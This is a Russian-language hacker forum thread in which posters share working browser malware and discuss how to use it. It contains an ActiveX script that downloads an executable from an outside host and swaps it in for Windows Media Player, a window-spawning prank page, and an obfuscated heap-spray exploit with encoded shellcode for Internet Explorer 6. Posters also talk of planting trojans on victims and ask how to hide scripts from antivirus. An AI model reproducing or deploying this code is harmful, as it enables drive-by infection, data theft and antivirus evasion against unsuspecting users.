Незнаю, может кто-то такое и выкладывал... По моему скрипт просто золотой =) Я его стырил с сайта, куда он был встроен... <script language="javascript"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://www.cup-of-coffee.pnz.ru/upload/bin.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2); location.href = "mms://"; </script> Незнаю, правильно я его вырезал, или нет... Проверять нехочу =) По адрессу http://www.cup-of-coffee.pnz.ru/upload/bin.exe ничего нет, ну всёравно на свой менять будем! И адресс в Program Files странно прописан, но в таком состоянии он был на сайте... Как он действует =) Через ActiveX загружается файл, (в нашем случаи http://www.cup-of-coffee.pnz.ru/upload/bin.exe) и заменяется на C:\Program Files\Windows Media Player\wmplayer.exe тоесть вместо Windows Media Player! Потом нас кидает на mms:// а это ссылка на медиа файл, и автоматически запускается Windows Media Player, который находится по адрессу C:\Program Files\Windows Media Player\wmplayer.exe где уже вместо него лежит наш вирус По моему офигительный скрипт!
Я в шоке!!! ОН РАБОТАЕТ!!! И путь реально надо указывать C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe всмысле 4 палки, и он загружается! Вот это да... <offtopic> Мне кажеться, или сейчас будет эпидемия пинча, ксинча и всякой другой заразы </offtopic>
Ponchik, не мог бы ты по-подпробнее объяснить ... что-то у меня не выходит ... Подвесил скрипт (заменив "http://www.cup-of-coffee.pnz.ru/upload/bin.exe" на ссылку со своими трояном) Тестировал на себе ... (трой рабочий на 100%) WM не запускается, трой не срабатывает ... (вешал на народе)
VectorG, Эх... Ну всёавно многие люди невидели то видео... Такчто надеюсь от темы будет польза... Посмторел видео... Можно тестить другим способом, никаких свойств рабочего стола ненадо! Просто создать HTML файл, сайт необязательно jino-net.ru я на локалхосте делал. А путь можно изменить на C:////test.exe В итоге у вас будет файл с сайта на диске C:/ и откроется Windows Media Player ================================================== AciD_FreaK, ну ты сделай как я сказал, не спросисывай сразу в Program Files, а на диск C:/ и может версия IE не подходит... ================================================== censored!, покажи хоть что-то что не палится каспеским =))))) В сетях на всех компах один IP, поэтому троянсие проги немогут их просканировать, тоесть у тех юзверей не бывает вирусов, из чего следует что у них нет антивирусов! Можно на каком-то сайте какой-то трой подсунуть, например ксинч
На Народе может не запахать, так как Народ не отдает свои файлы и изображения другим сайтам. Поэтому и пробуй Jino-Net. После очередного обновления БД антивиря сам найдешь на своем компе. Там этого полно! =)
вот выложу тож, старенькой правда,палиться, работает только при низкой настройке безопасности.. ну да все равно)
А... Вот ещё, старый, но работает, я правда так понимаю это не пирус, но что он делает с компом кроме зависания, я так и не понял... Он чтоли в telnet забивает ('location="telnet:Запуск вируса произведён удачно!!!" или я что-то не так понял... HTML: <html> <head> <title>Progressive-XP</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <script>setInterval('location="telnet:Запуск вируса произведён удачно!!!"',10);</script> <script language="javascript1.3"> setInterval('resizeTo(100,200)',0050); x=50; y=50; function plusY(){ if(y<screen.height-200){ y+=25; setTimeout('plusY()',0020); window.moveTo(x,y); }else{ minusY(); } } function minusY(){ if(y>0){ y-=25; setTimeout('minusY()',0020); window.moveTo(x,y); }else{ plusY(); } } function plusX(){ if(x<screen.width-100){ x+=20; setTimeout('plusX()',0020); window.moveTo(x,y); }else{ minusX(); } } function minusX(){ if(x>0){ x-=20; setTimeout('minusX()',0020); window.moveTo(x,y); }else{ plusX(); } } setInterval('window.open("","","height=200 width=100").location=self.location',0500); </script> </head> <body> <strong>Загрузка ... </strong> </body> </html> Блин! Касперь его палин! not-virus:BadJoke.JS.Spawn.e А несколько лет назад не палил В общем пошутить над ламаком без антивируса можно =)
Запустика это Работает сто пудов под хп. осел 6. Code: <html> <head> <script language="javascript"> var _GmIw=unescape("%u4b15%ud123%uc1fe%ubef9%u9637%u7c73%ue302%u7a7f%ua80d%u2575%u8148%u69e2%u9bd6%ueb80%u0c7d%u7e99%ub149%u7672%u904a%u4005%u2f79%u9334%ub6b4%u4b77%u9f3f%u7478%uf513%ub247%ub998%u3d71%ua9b8%u22b0%ub5fd%ub741%u034f%u14f9%ubabb%u434e%u3c42%u86b3%u35e0%ue139%ud520%u271c%u0a67%u15f8%u662d%ube04%u7097%u2437%u337b%u92fc%ud430%u2cbf%u1d91%u8496%u7deb%u7a70%u467e%u78b1%ua937%u4697%u0999%u32e1%u34d5%u96b2%u7343%u087f%u2cfc%u6679%u14be%u1d7c%ub51c%u3fba%u924f%u6bbf%u49d4%u8904%u27e0%ub8b9%ue285%u9024%u397b%ue3f6%u2d77%u41bb%u154a%u25b0%u4076%u9b9f%ub4b3%u4872%u0c71%u2fa8%u74b7%u0b35%u93d6%u3c05%u2198%u47f9%u7591%u4e42%u3d0d%u194b%ub6f8%u6967%u38f5%u7be2%u027c%ub1fd%u7f9f%ud403%u900c%ue03a%u2a47%u78d5%u3248%ufcc0%ue184%u963d%u0d99%ub341%u677d%u7043%u1c4f%ub266%u34b0%u4bb7%ud180%u2feb%ud601%ue311%u7579%u427e%ua904%uf523%u9305%u4ea8%u4698%u3577%u4ab6%u15bf%u3c37%ubebb%u9bb5%u3fba%uf983%u9291%ub924%u1d97%u7649%uf808%u732c%u2d25%u7271%u407a%u7414%u1027%ub8fd%u98b4%ud213%u7de1%ud418%ueb86%uf71a%u7ed6%u727a%u0d7f%u7b4f%u4a70%u1442%u3471%u9135%u66b5%ubab4%u24b0%ube9f%u81b6%u2ce0%ud53b%u883f%u2ffc%u2d40%ue329%u924b%u0abb%ua8fd%u411c%u3d48%u7c05%u7877%u1504%u3796%u49b1%ub79b%u2597%u2243%ubff8%u79b2%u7376%uf520%ub9b3%u0c99%u281d%u74e2%ub867%u2793%u9046%u47a9%u4e3c%u1b75%u90f9%uf92b%u307e%u14e3%u3149%ud0d3%u3de0%u4399%ub4a9%u3f24%u797c%ubb34%u98b1%u7225%u7667%ueb12%u3c78%u747b%ua837%ubf0c%ufe87%uf8c1%u71b9%u9740%u0dba%u33b8%u9fd5%u1593%u1d41%ue285%uf632%u1cd6%u137f%ub2f5%u4ab7%u057a%u77b6%u2f35%u4f91%u4847%ud42b%u757d%ub504%u6673%u70be%ufd0b%u4b42%ub02d%u27b3%u1946%u2ce1%ueb01%u777e%u7b7a%u924e%u8996%u78e2%ufc33%u989b%ub89f%u6971%ubbd5%u297f%ue0f7%ub127%u3c7c%u25a8%u4375%ub3b0%u1a3f%uc0ff%u24f8%u2c73%u1cb9%ube9b%uf920%ubab4%u4790%u7046%u4105%ufd10%ub666%u1d79%u4234%ub74e%ua915%ub5bf%u0d76%u120c%u72e1%ud403%u3d91%u4a48%u4937%u3996%u74f5%u3567%ud083%u97d6%u40b2%u284b%u2ffc%u8692%u4fe3%u992d%u7d04%u9314%u7371%u7a70%u7879%u117d%ud1c1%u09e2%ub7f9%u97b8%u7eb0%u2476%ue088%u7274%uba0d%u312d%u67eb%u9bb1%u96bb%ub4bf%u7fb9%u407c%u9f49%u904f%u924e%u483f%u21b3%u30d6%u75d4%uf523%u9991%u4346%u3466%ue102%u3c0c%ua927%u3b77%u2ae3%u41fc%u0535%u4a15%ud508%u421d%u477b%ufd0a%u4b77%ub6a8%u707c%u7a04%u8137%u2fe0%ubeb2%uf880%u7e98%u791c%ub53d%u7393%ue13a%ueb18%u7825%u7d14%u992c%u1c74%u9f98%ub296%u4776%u1475%ua949%u3771%ubeb0%u387b%ud4f5%ub427%u92b8%u3472%u0490%u3d40%u257f%u4a41%ud284%u1be2%ub6d5%ufc22%u0c67%ub393%u3fa8%u464e%u351d%ue348%u420d%u6643%u05b7%u2cb1%u3c2d%ub915%u4bf8%u9bbb%uf987%u6b91%u24fd%ubabf%ud397%ub5d6%u4f2f%uc933%ue983%ud9d8%ud9ee%u2474%u5bf4%u7381%u1213%u127a%u83e6%ufceb%uf4e2%u92ee%ue656%u7a12%ua399%uf12e%ue36e%u7b6a%u6dfd%u625d%ub999%u7b32%uaff9%u4e99%ue799%u4bfc%u7fd2%ufebe%u92d2%ubb15%uebd8%ub813%u12f9%u2e29%ue236%u9f67%ub999%u7b36%u80f9%u7699%u6d59%u664d%u0d13%u6699%ue799%uf3f9%uc24e%ub916%u2623%uf176%ud652%uba97%uea6a%u3a99%u6d1e%u6662%u6dbf%u727a%ueff9%ufa99%ue6a2%u7a12%u8e99%u252e%u1023%u2c72%u1e9b%uba91%ub669%u8a7a%ue298%u124d%u188a%u7498%u1945%u5ff5%u9f41%u0e61%u8b77%u1540%u927d%u2937%u956b%u1f66%ud57f%u0920%u8a7d%u1f3c%u836a%u7a12%ue612"); var _v41oHV=unescape("%u4bb7%u2747"); var _qEsu=20+_GmIw.length; while (_v41oHV.length<_qEsu) { _v41oHV+=_v41oHV; } var _xEzxzS=_v41oHV.substring(0,_qEsu); var _p6ChJV=_v41oHV.substring(0,_v41oHV.length-_qEsu); while(_p6ChJV.length+_qEsu<0x40000) { _p6ChJV+=_xEzxzS; } var _CBc0mV=new Array(); var _GeT5iua=0; var _9h88XE=2020; function _SWPVoJC() { _BbieHz.innerHTML=Math.round((_GeT5iua/_9h88XE)*100); if (_GeT5iua<_9h88XE) { _CBc0mV.push(_p6ChJV+_GmIw); _GeT5iua++; } else { _BbieHz.innerHTML=100; _erv7QtZ=document.createElement("input"); _erv7QtZ.type="radio"; _J14xn3ho=_erv7QtZ.createTextRange(); } } function _DzaOkN() { setInterval('_SWPVoJC()', 5); } </script> </head> <body onload="_DzaOkN()"> Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR /> In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR /> Progress: <span id="_BbieHz"></span>% </body> </html>
А чем кодирован последний скрипт, поидее касперский пищать на него тоже должен, или я что- то недопонимаю?
Странно, у меня молчок Avp на этот скрипт, может дело в месячной давности баз... А чем нибудь закодировать скрипт можно чтоб антивирусы отдыхали, не первый раз вопрос этот на форумах задаю, доходчивого ответа ещё не получял, где пишут "да" где "нет" может тут есть знающие люди?
